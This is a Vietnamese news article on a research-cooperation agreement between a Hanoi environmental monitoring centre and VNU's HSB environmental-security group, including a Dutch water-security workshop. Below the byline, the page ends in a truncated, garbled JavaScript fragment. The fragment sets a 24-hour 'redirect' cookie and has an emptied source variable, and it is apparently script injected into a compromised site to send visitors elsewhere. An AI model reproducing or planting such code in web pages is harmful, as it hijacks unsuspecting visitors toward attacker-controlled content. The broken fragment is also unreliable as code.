Hợp tác nghiên cứu giữa TT Quan trắc Tài nguyên và Môi trường Hà Nội với HSB

ANNN-4Chuyên gia của TT Quan trắc Tài nguyên và Môi trường Hà Nội sẽ phối hợp cùng các nhà khoa học của HSB – STES nghiên cứu, triển khai thực hiện các dự án đảm bảo an ninh môi trường.

Vừa qua, Khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN, Trung tâm Quan trắc Tài nguyên và Môi trường, thuộc Sở Tài nguyên và Môi trường Hà Nội đã ký Biên bản ghi nhớ về việc hợp tác nghiên cứu khoa học – công nghệ giữa hai đơn vị.

Theo đó, các chuyên gia của Trung tâm Quan trắc Tài nguyên và Môi trường Hà Nội sẽ phối hợp cùng các nhà khoa học của Nhóm nghiên cứu đảm bảo An ninh môi trường của Khoa Quản trị và Kinh doanh (gọi tắt là HSB – STES) nghiên cứu, triển khai thực hiện các dự án, đề tài trong lĩnh vực đảm bảo an ninh môi trường. Trong khuôn khổ Biên bản ghi nhớ hợp tác, hai bên sẽ cùng trao đổi các thông tin, nghiên cứu và ứng dụng khoa học và công nghệ, tham gia các chuyên đề đào tạo, hội thảo và hội nghị chuyên đề…trong lĩnh vực khảo sát địa chất, chất lượng nước, môi trường.

ANNN-1

Được thành lập từ năm 2016, Nhóm nghiên cứu của HSB đã hợp tác với nhiều đơn vị như TT Quan trắc môi trường – Sở Tài nguyên và Môi trường TP Hà Nội, Công ty TNHH một thành viên Nước sạch TP Hà Nội, Đại sứ quán Hà Lan… trong việc thực hiện các dự án đảm bảo an ninh môi trường trên địa bàn TP Hà Nội. Trước đó, HSB – STES đã phối hợp với các đơn vị tổ chức Hội thảo với chủ đề: “Khuôn khổ cho hợp tác công tư và triển khai giải pháp công nghệ đảm bảo an ninh nguồn nước của Hà Lan”. Hội thảo đã đem lại cho các nhà khoa học, các học viên của chương trình Thạc sĩ Quản trị An ninh Phi truyền thống (MNS) thông tin về tầm nhìn, nhiệm vụ, chiến lược của Chính phủ Hà Lan trong việc quản lý An ninh nguồn nước; khung hợp tác giữa chính phủ Hà Lan và các công ty, tổ chức đầu tư đang áp dụng công nghệ mới về xử lý nước, cũng như giới thiệu các công nghệ mới hiện đang được áp dụng tại Hà Lan để đảm bảo an ninh nguồn nước.

                                                                Nguyên Minh

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’